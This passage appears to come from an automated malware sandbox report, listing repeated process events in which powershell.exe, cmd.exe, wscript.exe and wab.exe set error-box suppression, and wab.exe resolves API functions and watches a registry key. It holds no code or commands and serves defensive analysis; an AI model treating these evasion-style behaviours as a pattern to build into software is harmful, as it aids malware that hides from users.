              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,17_2_004047CB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
